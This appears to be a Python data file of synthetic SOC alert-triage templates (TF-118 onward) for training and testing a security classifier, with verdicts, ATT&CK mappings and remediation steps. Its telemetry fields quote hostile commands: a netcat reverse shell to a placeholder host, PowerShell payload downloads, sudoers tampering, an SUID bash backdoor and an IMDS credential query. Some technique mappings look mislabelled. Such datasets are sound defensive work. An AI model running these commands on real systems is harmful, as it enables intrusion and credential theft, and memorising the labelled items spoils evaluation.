# -*- coding: utf-8 -*-
"""
AegisX Template Specifications — Chunk 5 (v0.4)
================================================
Templates TF-118 through TF-150 (33 templates).

Domains:
- Domain 16: Linux Enterprise Telemetry (12 templates, TF-118 to TF-129)
- Domain 17: Enterprise Business Contexts & Role Lookalikes (11 templates, TF-130 to TF-140)
- Domain 18: Threat Intelligence & Conflicting Evidence (10 templates, TF-141 to TF-150)

Classification targets for Chunk 5:
- 5 benign, 7 suspicious, 7 likely_malicious, 7 confirmed_malicious, 7 insufficient_evidence.
Splits for Chunk 5:
- 26 train, 3 val, 4 test.
OS for Chunk 5:
- 15 Windows, 18 Linux.
"""

CHUNK_5 = [
    # --- DOMAIN 16: Linux Enterprise Telemetry (12 templates) ---
    ("TF-118", "Linux Sudo Privilege Escalation via Sudoers NOPASSWD", "linux_telemetry", "alert_triage", "confirmed_malicious", "train", None, "Linux", "server", "www-data",
     "Unauthorized NOPASSWD Sudoers Rule Added by Web Server User", "critical", "Sudoers File Tampering",
     [("file_modification", "File /etc/sudoers.d/99-maintenance created containing 'www-data ALL=(ALL) NOPASSWD: ALL'", '{"path": "/etc/sudoers.d/99-maintenance", "content": "www-data ALL=(ALL) NOPASSWD: ALL"}'),
      ("process_creation", "www-data executed 'sudo su -' without password prompt gaining interactive root shell", '{"user": "www-data", "cmd": "sudo su -", "target": "root"}'),
      ("authentication", "PAM session opened for root by www-data via sudo", '{"user": "www-data", "target": "root", "service": "sudo"}')],
     [("Web service user exploited privilege flaw to write full NOPASSWD root access into sudoers drop-in directory.", ["EVT-001"], "critical"),
      ("Immediate root shell takeover executed and logged by PAM subsystem.", ["EVT-002", "EVT-003"], "critical")],
     "Definitive local privilege escalation: web server account creating unauthenticated sudo permissions and assuming root identity.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-002", "EVT-003"])],
     [("Delete unauthorized drop-in file /etc/sudoers.d/99-maintenance immediately.", "immediate", "Revoke root access."),
      ("Terminate all active processes and shells owned by www-data on {hostname}.", "immediate", "Sever root session.")], None),

    ("TF-119", "Linux SSH Brute Force from Tor Exit Node", "linux_telemetry", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "root",
     "Automated SSH Password Spraying Against Public Facing Linux Server", "high", "External SSH Password Spray",
     [("network_connection", "External IP 185.220.101.33 initiated 240 TCP connection bursts to port 22", '{"source_ip": "185.220.101.33", "dest_port": 22, "burst_count": 240}'),
      ("authentication", "sshd recorded 75 PAM authentication failures across accounts root, ubuntu, admin, deploy", '{"service": "sshd", "failed_attempts": 75, "accounts": ["root", "ubuntu", "admin", "deploy"]}'),
      ("threat_intel_match", "Source IP 185.220.101.33 identified as active Tor exit node on threat intelligence feed", '{"ip": "185.220.101.33", "feed": "TorExitNodes"}')],
     [("Coordinated distributed credential brute force targeting multiple administrative usernames.", ["EVT-001", "EVT-002"], "high"),
      ("Originating address confirmed as anonymizing Tor exit node on active threat intelligence feed.", ["EVT-003"], "high")],
     "Automated SSH brute-force attack originating from anonymization network targeting privileged accounts.",
     [("T1110.001", "Password Guessing", "Credential Access", ["EVT-002"]),
      ("T1078", "Valid Accounts", "Defense Evasion", ["EVT-002"])],
     [("Block source IP 185.220.101.33 at perimeter firewall and host iptables.", "immediate", "Halt brute-force attempts."),
      ("Enforce SSH key-only authentication and disable password authentication in /etc/ssh/sshd_config.", "high", "Harden SSH daemon.")], None),

    ("TF-120", "Linux Authorized Systemd Service Deployment by Sysadmin", "linux_telemetry", "evidence_analysis", "benign", "train", "benign_vs_suspicious", "Linux", "server", "deployer",
     "Production Microservice Systemd Unit Created and Started via CI/CD", "informational", "Systemd Service Deployment",
     [("file_modification", "New unit file /etc/systemd/system/payment-gateway.service written by deployer", '{"path": "/etc/systemd/system/payment-gateway.service"}'),
      ("process_creation", "deployer executed sudo systemctl daemon-reload && sudo systemctl enable --now payment-gateway", '{"cmd": "sudo systemctl daemon-reload && sudo systemctl enable --now payment-gateway"}'),
      ("process_creation", "payment-gateway daemon started from signed binary /opt/payment/bin/gateway", '{"binary": "/opt/payment/bin/gateway", "user": "appuser"}')],
     [("Authorized deployment account registered and enabled standard production systemd unit.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Documented CI/CD infrastructure deployment registering and launching corporate payment microservice.", [],
     [("Close alert as authorized production systemd service deployment.", "low", "Routine DevOps deployment.")], None),

    ("TF-121", "Linux User Adding Unauthorized SUID Bit to /bin/bash", "linux_telemetry", "alert_triage", "confirmed_malicious", "train", None, "Linux", "server", "ubuntu",
     "SUID Bit Enabled on System Shell Binary in User Directory", "critical", "SUID Shell Persistence",
     [("process_creation", "chmod u+s /tmp/bash executed by user ubuntu", '{"cmd": "chmod u+s /tmp/bash"}'),
      ("file_modification", "Binary /tmp/bash permissions modified to 04755 (setuid root)", '{"path": "/tmp/bash", "mode": "04755"}'),
      ("process_creation", "/tmp/bash -p launched resulting in effective UID 0 (root)", '{"cmd": "/tmp/bash -p", "euid": 0}')],
     [("User established classic SUID root backdoor by copying shell and granting setuid permissions.", ["EVT-001", "EVT-002"], "critical"),
      ("Privileged shell invoked with -p switch to maintain root privilege.", ["EVT-003"], "critical")],
     "Deliberate establishment of an SUID root shell persistence backdoor for unauthenticated privilege escalation.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001", "EVT-002", "EVT-003"])],
     [("Remove SUID binary /tmp/bash immediately.", "immediate", "Destroy root backdoor."),
      ("Lock account ubuntu and investigate recent commands and login origins.", "immediate", "Secure compromised account.")], None),

    ("TF-122", "Linux Kernel Core Dump Generated with Missing Stack Trace", "linux_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "root",
     "Daemon Segfault with Truncated Core Dump Telemetry", "low", "Incomplete Crash Telemetry",
     [("process_creation", "Daemon /usr/sbin/apache2 terminated unexpectedly with signal 11 (SIGSEGV)", '{"process": "apache2", "signal": 11}'),
      ("file_modification", "Kernel coredump disabled via ulimit, no core artifact saved in /var/crash", '{"core_dump_saved": false}')],
     [("Web server daemon crashed due to segmentation fault, but core dump was not generated.", ["EVT-001", "EVT-002"], "low")],
     "Segmentation fault can result from benign memory bug or buffer overflow exploit attempt; absent core dump prevents root cause analysis.", [],
     [("Enable kernel coredumps via sysctl fs.suid_dumpable and review Apache error log around crash timestamp.", "medium", "Collect crash diagnostics.")],
     ["Apache /var/log/apache2/error.log", "Linux system journalctl -k kernel log"]),

    ("TF-123", "Linux Package Installation from PPA Repository", "linux_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "devops",
     "Apt Package Manager Installing Binary from Unofficial PPA", "medium", "Third-Party PPA Addition",
     [("file_modification", "New repository file /etc/apt/sources.list.d/custom-tools.list added", '{"repo": "ppa:unverified-dev/experimental"}'),
      ("process_creation", "apt-get update && apt-get install -y custom-debug-tools executed by devops via sudo", '{"cmd": "apt-get install -y custom-debug-tools"}'),
      ("network_connection", "apt-get downloaded .deb archive from non-canonical CDN 45.33.32.156:80", '{"dest_ip": "45.33.32.156", "port": 80}')],
     [("DevOps user added unverified third-party personal package archive to corporate Linux server.", ["EVT-001"], "medium"),
      ("Software packages retrieved from external unvetted repository host.", ["EVT-002", "EVT-003"], "medium")],
     "Installing packages from unvetted PPA introduces software supply chain risk on enterprise production server.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-002"])],
     [("Review packages installed from custom-tools.list and audit against corporate approved software policy.", "medium", "Audit third-party package.")], None),

    ("TF-124", "Linux Sudoers Modification by Non-Admin Service", "linux_telemetry", "alert_triage", "confirmed_malicious", "train", None, "Linux", "server", "www-data",
     "Direct Echo Command Appending Entry to Sudoers File", "critical", "Direct Sudoers Tampering",
     [("process_creation", "sh executed: echo 'nobody ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers", '{"cmd": "echo nobody ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers"}'),
      ("file_modification", "Checksum of /etc/sudoers changed without visudo validation", '{"file": "/etc/sudoers", "modified": true}')],
     [("Adversary bypassed visudo syntax checking to append arbitrary privilege grant directly to sudoers.", ["EVT-001", "EVT-002"], "critical")],
     "Direct unauthorized appending to /etc/sudoers confirms deliberate privilege escalation tampering.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001"])],
     [("Restore /etc/sudoers from verified backup and lock nobody account.", "immediate", "Restore authorization baseline."),
      ("Inspect parent process and web application root for shell origin.", "immediate", "Identify entry vector.")], None),

    ("TF-125", "Linux Bash History Wiped via Unset HISTFILE", "linux_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "ubuntu",
     "Interactive Session Disabling Command History Logging", "medium", "History Logging Disabled",
     [("process_creation", "Interactive bash session executed 'unset HISTFILE && export HISTSIZE=0'", '{"cmd": "unset HISTFILE && export HISTSIZE=0"}'),
      ("authentication", "Interactive SSH login active for ubuntu from internal jumpbox 10.0.1.77", '{"user": "ubuntu", "source": "10.0.1.77"}')],
     [("User deliberately deactivated shell history logging for current interactive session.", ["EVT-001", "EVT-002"], "medium")],
     "Disabling shell history prevents audit logging and is frequently used by attackers or engineers conducting untracked actions.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001"])],
     [("Interview user ubuntu regarding reasons for disabling shell command history.", "medium", "Verify activity intent.")], None),

    ("TF-126", "Linux PAM Authentication Failure Spike for Invalid Users", "linux_telemetry", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "root",
     "Rapid Inbound SSH Attempts Targeting Non-Existent Usernames", "high", "Invalid User SSH Enumeration",
     [("network_connection", "External host 91.234.56.78 established 110 rapid SSH handshakes in 60 seconds", '{"source_ip": "91.234.56.78", "port": 22}'),
      ("authentication", "sshd logged 'Invalid user' PAM failures for oracle, postgres, test, git, ftp", '{"service": "sshd", "failed_count": 110, "users": ["oracle", "postgres", "test", "git", "ftp"]}')],
     [("External host executed automated user enumeration and dictionary spray against Linux SSH daemon.", ["EVT-001", "EVT-002"], "high")],
     "Targeted username enumeration probe attempting common default daemon accounts from untrusted external IP.",
     [("T1110.001", "Password Guessing", "Credential Access", ["EVT-002"])],
     [("Block external IP 91.234.56.78 permanently at edge firewall.", "high", "Halt ongoing scan."),
      ("Verify fail2ban service is active and enforcing automatic bans on {hostname}.", "medium", "Ensure automated defense.")], None),

    ("TF-127", "Linux Cron Job Adding Remote Netcat Listener", "linux_telemetry", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "www-data",
     "Cron Job Spawning Netcat Reverse Shell Listener", "high", "Netcat Backdoor Persistence",
     [("file_modification", "Crontab for user www-data created containing 'nc -e /bin/sh {ext_ip} 5555'", '{"path": "/var/spool/cron/crontabs/www-data", "line": "nc -e /bin/sh {ext_ip} 5555"}'),
      ("process_creation", "CRON executed /bin/sh spawning nc process with executable shell switch", '{"cmd": "nc -e /bin/sh {ext_ip} 5555"}')],
     [("Unprivileged service account installed persistent cron job invoking netcat reverse shell.", ["EVT-001", "EVT-002"], "high")],
     "Netcat shell binding configured as scheduled persistence represents an active remote access backdoor.",
     [("T1053.005", "Scheduled Task", "Persistence", ["EVT-001"]),
      ("T1059.003", "Windows Command Shell", "Execution", ["EVT-002"])],
     [("Kill netcat process and delete www-data crontab.", "immediate", "Neutralize backdoor."),
      ("Block external IP {ext_ip} at network border.", "high", "Sever C2 communications.")], None),

    ("TF-128", "Linux Systemd Timer Running Nightly Python Security Health Check", "linux_telemetry", "evidence_analysis", "benign", "test", None, "Linux", "server", "secops",
     "Automated Security Compliance Script Running Under Systemd Timer", "informational", "Compliance Script Execution",
     [("scheduled_task", "systemd timer secops-compliance.timer triggered nightly audit run", '{"timer": "secops-compliance.timer"}'),
      ("process_creation", "python3 /opt/secops/compliance_check.py --audit-all executed successfully", '{"cmd": "python3 /opt/secops/compliance_check.py --audit-all"}'),
      ("file_modification", "Compliance audit report updated in /var/log/secops_compliance.json", '{"file": "/var/log/secops_compliance.json"}')],
     [("Authorized security operations Python script executed scheduled CIS benchmark audit.", ["EVT-001", "EVT-002", "EVT-003"], "informational")],
     "Standard automated security operations compliance verification running under official timer.",
     [("T1059.006", "Python", "Execution", ["EVT-002"])],
     [("Close alert as verified internal security compliance audit execution.", "low", "Routine security audit.")], None),

    ("TF-129", "Linux Kernel Module Loaded with Missing Verification Signature", "linux_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "root",
     "Insmod Invoked on Kernel Module with Unverified Key", "medium", "Unverified Kernel Module",
     [("process_creation", "root executed insmod /lib/modules/custom_netfilter.ko", '{"cmd": "insmod /lib/modules/custom_netfilter.ko"}'),
      ("file_modification", "Kernel log indicates module 'custom_netfilter' lacks cryptographic signature", '{"module": "custom_netfilter", "signed": false}')],
     [("Unsigned kernel module loaded directly into running Linux kernel.", ["EVT-001", "EVT-002"], "medium")],
     "Loading kernel modules can be legitimate for proprietary network hardware or malicious for rootkits; missing signature requires source validation.", [],
     [("Check hardware vendor documentation and verify sha256 checksum of custom_netfilter.ko against vendor release.", "high", "Verify module source.")],
     ["Module SHA-256 hash", "Hardware vendor driver release notes"]),

    # --- DOMAIN 17: Enterprise Business Contexts & Role Lookalikes (11 templates) ---
    ("TF-130", "Finance Workstation Executing PowerShell Macro from Invoice", "business_contexts", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "finance01",
     "Accounting Desktop Spawning PowerShell via Macro Attachment", "high", "Finance Macro Execution",
     [("email", "Email received by finance01 with subject 'Urgent Wire Transfer Advice.xlsm'", '{"sender": "accounting@vendor-express.net", "attachment": "Urgent Wire Transfer Advice.xlsm"}'),
      ("process_creation", "EXCEL.EXE spawned powershell.exe executing download cradle from {domain}", '{"parent": "EXCEL.EXE", "child": "powershell.exe", "cmd": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile(http://{domain}/bill.exe, C:\\\\Temp\\\\bill.exe)"}'),
      ("file_modification", "Binary bill.exe dropped into C:\\Temp\\", '{"path": "C:\\\\Temp\\\\bill.exe"}')],
     [("Finance department employee opened malicious macro email disguised as wire transfer invoice.", ["EVT-001", "EVT-002"], "high"),
      ("Macro executed download cradle dropping secondary binary into temporary directory.", ["EVT-002", "EVT-003"], "high")],
     "Targeted phishing attack against finance department utilizing weaponized macro document to deploy loader executable.",
     [("T1566.001", "Spearphishing Attachment", "Initial Access", ["EVT-001"]),
      ("T1059.005", "Visual Basic", "Execution", ["EVT-002"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002", "EVT-003"])],
     [("Isolate finance workstation {hostname} and freeze user financial portal access.", "immediate", "Prevent wire fraud."),
      ("Purge phishing email from all employee inboxes.", "high", "Contain phishing campaign.")], None),

    ("TF-131", "HR Workstation Syncing Employee Records to Personal Dropbox", "business_contexts", "alert_triage", "likely_malicious", "val", "suspicious_vs_likely_malicious", "Windows", "workstation", "hr01",
     "Large ZIP Archive Containing PII Uploaded to Personal Cloud Storage", "high", "HR Data Exfiltration",
     [("process_creation", "7z.exe created password-protected archive employee_ssn_2026.zip on Desktop", '{"cmd": "7z.exe a employee_ssn_2026.zip C:\\\\HR\\\\Confidential\\\\*"}'),
      ("network_connection", "browser process uploaded employee_ssn_2026.zip to personal Dropbox instance", '{"dest_host": "content.dropboxapi.com", "bytes_transferred": 184500000}'),
      ("proxy_log", "Web proxy classified destination as personal file storage category", '{"category": "Personal Cloud Storage", "action": "ALLOWED"}')],
     [("HR workstation compressed confidential personnel directory into encrypted zip archive.", ["EVT-001"], "high"),
      ("Archived PII data uploaded to unapproved personal Dropbox cloud service.", ["EVT-002", "EVT-003"], "high")],
     "Unauthorized transfer of confidential personnel records to personal cloud storage constitutes high-risk data exfiltration.",
     [("T1048.003", "Exfiltration Over Unencrypted Non-C2 Protocol", "Exfiltration", ["EVT-001"]),
      ("T1567.002", "Exfiltration to Cloud Storage", "Exfiltration", ["EVT-002", "EVT-003"])],
     [("Notify HR leadership and corporate Data Protection Officer immediately.", "immediate", "Initiate breach protocol."),
      ("Suspend network access for user hr01 on {hostname}.", "immediate", "Prevent further data loss.")], None),

    ("TF-132", "Developer Workstation Querying AWS Metadata Service", "business_contexts", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "workstation", "developer01",
     "Local Script Querying AWS IMDSv1 Endpoint from Developer Laptop", "medium", "Cloud Metadata Service Query",
     [("process_creation", "curl executed targeting 169.254.169.254/latest/meta-data/iam/security-credentials/", '{"cmd": "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'),
      ("network_connection", "Outbound HTTP request to link-local IP 169.254.169.254:80", '{"dest_ip": "169.254.169.254", "dest_port": 80}')],
     [("Developer workstation queried link-local cloud metadata service to inspect IAM credentials.", ["EVT-001", "EVT-002"], "medium")],
     "IMDS queries are common during cloud application debugging, but are also used during SSRF and credential theft attacks.",
     [("T1082", "System Information Discovery", "Discovery", ["EVT-001", "EVT-002"])],
     [("Contact developer01 to verify whether IMDS query was part of local cloud emulation or testing.", "medium", "Verify development task.")], None),

    ("TF-133", "Domain Controller Receiving Inbound LDAP Query Burst", "business_contexts", "alert_triage", "suspicious", "train", "suspicious_vs_likely_malicious", "Windows", "server", "intern01",
     "Domain Controller Handling Rapid LDAP Queries from New Intern Laptop", "medium", "Active Directory LDAP Reconnaissance",
     [("network_connection", "Workstation 10.0.1.77 established high-frequency TCP connections to DC port 389", '{"dest_port": 389, "session_count": 85}'),
      ("authentication", "LDAP bind requests authenticated using domain credentials of intern01", '{"user": "intern01", "bind_type": "NTLM"}')],
     [("Intern user account performed systematic LDAP query burst against Domain Controller.", ["EVT-001", "EVT-002"], "medium")],
     "Rapid systematic LDAP queries from non-IT endpoints frequently indicate BloodHound or ADRecon reconnaissance.",
     [("T1087.002", "Domain Account Discovery", "Discovery", ["EVT-001", "EVT-002"])],
     [("Interview intern01 regarding origin of LDAP query scripts.", "high", "Verify tool usage."),
      ("Inspect workstation 10.0.1.77 for BloodHound, SharpHound, or AdFind utilities.", "high", "Search for recon tools.")], None),

    ("TF-134", "Database Server Executing XP_CMDSHELL via Admin Logon", "business_contexts", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "sa",
     "SQL Server xp_cmdshell Enabled and Spawning PowerShell", "critical", "SQL xp_cmdshell Exploitation",
     [("process_creation", "sqlservr.exe spawned cmd.exe via xp_cmdshell executing whoami /priv", '{"parent": "sqlservr.exe", "child": "cmd.exe", "cmd": "cmd.exe /c whoami /priv"}'),
      ("process_creation", "cmd.exe spawned powershell.exe downloading secondary stage from {domain}", '{"child": "powershell.exe", "cmd": "powershell.exe -c (iwr http://{domain}/agent.exe).OutFile(C:\\\\Temp\\\\agent.exe)"}'),
      ("file_modification", "Executable agent.exe written to C:\\Temp\\", '{"path": "C:\\\\Temp\\\\agent.exe"}')],
     [("MSSQL database server process enabled xp_cmdshell to spawn operating system shell commands.", ["EVT-001"], "critical"),
      ("Database-initiated shell executed PowerShell downloading external executable payload.", ["EVT-002", "EVT-003"], "critical")],
     "SQL injection or compromised SA credentials exploited to execute arbitrary operating system commands from database engine.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-002"]),
      ("T1059.003", "Windows Command Shell", "Execution", ["EVT-001"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002", "EVT-003"])],
     [("Disable xp_cmdshell via sp_configure immediately on database server.", "immediate", "Halt OS command execution."),
      ("Isolate database server {hostname} and change SA account credentials.", "immediate", "Contain database compromise.")], None),

    ("TF-135", "Executive Laptop Logging In from Two Geographically Disjoint Locations", "business_contexts", "alert_triage", "suspicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "exec01",
     "Impossible Travel Detected for Senior Executive M365 Account", "medium", "Impossible Travel Anomaly",
     [("authentication", "Successful Azure AD interactive login from New York, USA IP 198.51.100.15", '{"user": "exec01@company.com", "location": "New York, USA", "timestamp": "14:00:00Z"}'),
      ("authentication", "Successful Azure AD interactive login from Amsterdam, Netherlands IP 185.190.140.22", '{"user": "exec01@company.com", "location": "Amsterdam, Netherlands", "timestamp": "14:22:00Z"}')],
     [("Senior executive account authenticated from two countries separated by 3,600 miles within 22 minutes.", ["EVT-001", "EVT-002"], "medium")],
     "Impossible travel strongly suggests credential theft, active token replay, or simultaneous VPN usage.",
     [("T1078.002", "Domain Accounts", "Defense Evasion", ["EVT-001", "EVT-002"])],
     [("Trigger immediate session revocation and force password reset for exec01.", "immediate", "Invalidate active tokens."),
      ("Contact executive directly via out-of-band mobile verification to confirm travel status.", "high", "Verify user location.")], None),

    ("TF-136", "Helpdesk Operator Remote Screen Sharing Session via Authorized Tool", "business_contexts", "alert_triage", "benign", "train", "benign_vs_suspicious", "Windows", "workstation", "helpdesk01",
     "Authorized Remote Support Session Initiated via TeamViewer Enterprise", "low", "Authorized Remote Desktop Assistance",
     [("process_creation", "TeamViewer.exe initiated remote control session to employee desktop PC-001", '{"caller": "helpdesk01", "target": "PC-001", "licensed": true}'),
      ("network_connection", "Encrypted connection established to corporate TeamViewer gateway router", '{"dest_host": "router.teamviewer.com", "port": 443}'),
      ("user_report", "Employee employee01 submitted IT ticket #8491 requesting Outlook configuration help", '{"ticket": 8491, "user": "employee01"}')],
     [("Helpdesk technician established remote support session in response to open user support ticket.", ["EVT-001", "EVT-002", "EVT-003"], "low")],
     "Verified internal IT support workflow utilizing approved enterprise remote assistance platform.",
     [("T1021.001", "Remote Desktop Protocol", "Lateral Movement", ["EVT-001"])],
     [("Close alert as authorized corporate remote assistance session.", "low", "Verified IT ticket support.")], None),

    ("TF-137", "Security Analyst Testing Sigma Rules in Isolated Lab", "business_contexts", "alert_triage", "suspicious", "test", "benign_vs_suspicious", "Linux", "server", "secops",
     "Security Engineer Executing Atomic Red Team in Sandbox Environment", "medium", "Simulated Attack Testing",
     [("process_creation", "Invoke-AtomicRedTeam executed T1059.001 test scripts inside lab environment", '{"tool": "AtomicRedTeam", "test_id": "T1059.001"}'),
      ("file_modification", "Flag file C:\\Temp\\art_test_flag.txt written and deleted", '{"file": "art_test_flag.txt"}'),
      ("user_report", "SecOps calendar shows scheduled EDR detection engineering validation window", '{"event": "Sigma Rule Tuning", "authorized": true}')],
     [("Security operations personnel conducted scheduled detection engineering test using Atomic Red Team.", ["EVT-001", "EVT-002", "EVT-003"], "medium")],
     "Security testing activity inside designated environment during approved change window, but triggers active detection heuristics.",
     [("T1059.001", "PowerShell", "Execution", ["EVT-001"])],
     [("Verify change ticket for detection validation exercise.", "low", "Authorized security testing.")], None),

    ("TF-138", "Software Engineer Testing API Endpoint via Curl Command", "business_contexts", "evidence_analysis", "benign", "train", "benign_vs_suspicious", "Linux", "workstation", "developer01",
     "Developer Running Health Check Curl Loop Against Local Docker Container", "informational", "Local API Testing",
     [("process_creation", "developer01 executed while true; do curl -s http://localhost:8080/health; sleep 5; done", '{"cmd": "while true; do curl -s http://localhost:8080/health; sleep 5; done"}'),
      ("network_connection", "Repeated local loopback HTTP GET requests to 127.0.0.1:8080", '{"dest_ip": "127.0.0.1", "dest_port": 8080}')],
     [("Software developer executed automated curl loop to test responsiveness of local microservice container.", ["EVT-001", "EVT-002"], "informational")],
     "Standard engineering workflow verifying local containerized software build health.", [],
     [("Close alert as normal developer application testing activity.", "low", "Routine engineering test.")], None),

    ("TF-139", "Unmanaged Laptop Plugged into Core Server Switchport", "business_contexts", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "unknown",
     "Unregistered Device MAC Address Requesting DHCP Lease on Server VLAN", "medium", "Rogue Network Device",
     [("other", "Core switch port 1/0/24 hardware link state change event with unmanaged MAC 00:1A:2B:3C:4D:5E", '{"switchport": "1/0/24", "mac": "00:1A:2B:3C:4D:5E"}'),
      ("vulnerability_scan", "MAC 00:1A:2B:3C:4D:5E has no record in 802.1X NAC database or asset registry", '{"registered": false}')],
     [("Unregistered physical hardware connected directly to high-security server network segment.", ["EVT-001", "EVT-002"], "medium")],
     "Connecting unmanaged device to server VLAN is a serious policy violation and potential rogue hardware implant.", [],
     [("Dispatch physical security or network engineer to verify device plugged into switchport 1/0/24.", "high", "Locate physical hardware.")],
     ["Switch MAC address table", "Physical security access badge logs for server room"]),

    ("TF-140", "Customer Support Desktop Downloading Remote Support Utility", "business_contexts", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "support01",
     "Support Representative Downloading AnyDesk Client from Web", "low", "Remote Access Tool Ingress",
     [("proxy_log", "Web proxy recorded download of AnyDesk.exe from official anydesk.com domain", '{"url": "https://download.anydesk.com/AnyDesk.exe"}'),
      ("file_modification", "AnyDesk.exe saved to user Downloads directory but not executed", '{"path": "C:\\\\Users\\\\support01\\\\Downloads\\\\AnyDesk.exe", "executed": false}')],
     [("Customer support agent downloaded legitimate remote support tool to local workstation.", ["EVT-001", "EVT-002"], "low")],
     "AnyDesk is commonly abused by social engineering threat actors, but also used by support staff; execution context is missing.", [],
     [("Contact support01 manager to determine whether AnyDesk usage is authorized for external support.", "medium", "Confirm authorization.")],
     ["User ticket queue", "Endpoint process execution log for AnyDesk.exe"]),

    # --- DOMAIN 18: Threat Intelligence Context & Conflicting Evidence (10 templates) ---
    ("TF-141", "Hash Matches Known Ransomware on Threat Intelligence Feed", "threat_intel_scenarios", "alert_triage", "confirmed_malicious", "test", None, "Windows", "server", "employee05",
     "Binary Hash Matches Confirmed BlackCat Ransomware Encryptor", "critical", "Known Ransomware Match",
     [("threat_intel_match", "SHA-256 hash of C:\\Temp\\enc.exe matches BlackCat/ALPHV ransomware sample", '{"malware_family": "BlackCat", "hash": "{mal_hash}"}'),
      ("process_creation", "enc.exe executed with switches -p /data -m batch", '{"cmd": "C:\\\\Temp\\\\enc.exe -p /data -m batch"}'),
      ("file_modification", "140 files renamed with extension .blackcat in C:\\Shares\\Data", '{"extension": ".blackcat", "count": 140}')],
     [("Binary cryptographic hash verified as active BlackCat ransomware strain on multiple threat feeds.", ["EVT-001"], "critical"),
      ("Mass file encryption verified underway across shared directory.", ["EVT-002", "EVT-003"], "critical")],
     "Unambiguous confirmed ransomware outbreak verified through cryptographic hash matching and active file destruction.",
     [("T1486", "Data Encrypted for Impact", "Impact", ["EVT-001", "EVT-002", "EVT-003"])],
     [("Isolate server {hostname} from network immediately.", "immediate", "Prevent spread of encryption."),
      ("Shut down shared storage volume C:\\Shares\\Data and preserve volume shadow copies.", "immediate", "Halt file destruction.")], None),

    ("TF-142", "Conflicting AV Flag: Clean Threat Intel but Behavioral Malice", "threat_intel_scenarios", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "contractor01",
     "Zero-Day Binary Evading AV Signatures while Dumping LSASS Memory", "high", "Behavioral In-Memory Evasion",
     [("threat_intel_match", "Cryptographic hash of custom utility memory_tool.exe reported clean (0/72 detections)", '{"vt_score": "0/72", "hash": "{clean_hash}"}'),
      ("process_creation", "memory_tool.exe opened handle to lsass.exe with PROCESS_VM_READ access rights", '{"target": "lsass.exe", "access": "PROCESS_VM_READ"}'),
      ("file_modification", "Dump file memory.dmp written to C:\\Users\\Public\\", '{"path": "C:\\\\Users\\\\Public\\\\memory.dmp"}')],
     [("Binary exhibits zero static antivirus detections across commercial threat intelligence engines.", ["EVT-001"], "low"),
      ("Dynamic behavioral telemetry demonstrates definitive LSASS process memory extraction.", ["EVT-002", "EVT-003"], "high")],
     "Classic zero-day evasion: static threat intelligence is clean, but behavioral evidence confirms credential dumping.",
     [("T1003.001", "LSASS Memory", "Credential Access", ["EVT-002", "EVT-003"])],
     [("Kill memory_tool.exe and isolate workstation {hostname}.", "immediate", "Prevent credential extraction."),
      ("Submit memory_tool.exe binary to internal reverse engineering team.", "high", "Analyze novel hacktool.")], None),

    ("TF-143", "Signed Microsoft Binary Executing Malicious Payload via LOLBin", "threat_intel_scenarios", "alert_triage", "confirmed_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "developer01",
     "Signed MSBuild Executing C# Code Injector via Inline Tasks", "critical", "MSBuild LOLBin Execution",
     [("process_creation", "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe executed project.xml", '{"cmd": "MSBuild.exe project.xml", "signed": true}'),
      ("threat_intel_match", "project.xml contains embedded C# source matching known Casey Smith MSBuild bypass payload", '{"pattern": "MSBuild-Inline-Task-Bypass"}'),
      ("network_connection", "MSBuild.exe established outbound TCP socket to {ext_ip}:4444", '{"dest_ip": "{ext_ip}", "dest_port": 4444}')],
     [("Validly signed Microsoft development utility MSBuild abused to execute arbitrary in-line code.", ["EVT-001", "EVT-002"], "high"),
      ("Signed binary initiated external reverse shell connection to untrusted IP.", ["EVT-003"], "critical")],
     "Living-off-the-Land binary abuse bypassing executable allowlisting to establish outbound shell.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-003"])],
     [("Terminate running MSBuild process and quarantine project.xml file.", "immediate", "Kill living-off-the-land execution."),
      ("Review software restriction policies to block MSBuild execution from user temporary folders.", "high", "Prevent LOLBin abuse.")], None),

    ("TF-144", "External IP on Threat Feed with No Internal Host Execution", "threat_intel_scenarios", "alert_triage", "suspicious", "val", "benign_vs_suspicious", "Windows", "server", "none",
     "Firewall Blocking Inbound Packets from Known Cobalt Strike C2 IP", "medium", "Threat Intel Perimeter Block",
     [("threat_intel_match", "IP 194.26.29.112 flagged as active Cobalt Strike Team Server on threat feed", '{"ip": "194.26.29.112", "threat": "CobaltStrike"}'),
      ("firewall_log", "Perimeter edge firewall dropped 12 TCP SYN packets from 194.26.29.112 targeting port 443", '{"action": "DROP", "count": 12}')],
